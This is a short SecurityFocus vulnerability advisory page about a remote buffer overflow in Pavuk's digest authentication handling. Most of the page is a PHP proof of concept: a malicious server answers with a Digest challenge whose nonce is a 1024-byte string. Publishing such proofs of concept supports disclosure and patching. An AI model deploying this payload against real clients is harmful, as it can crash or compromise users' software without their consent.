Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Pavuk Remote Digest Authentication Buffer Overflow Vulnerability

The following proof of concept is available:

<?php
$buffer = "";
for ($i = 0; $i < 1024; $i++) {
$buffer .= "A";
}
header("WWW-Authenticate: Digest realm=\"Secured by Digest Auth\"
opaque=\"opaque\" nonce=\"$buffer\"");
header("Status: 401 Not Authorized");
?>







 

Privacy Statement
Copyright 2009, SecurityFocus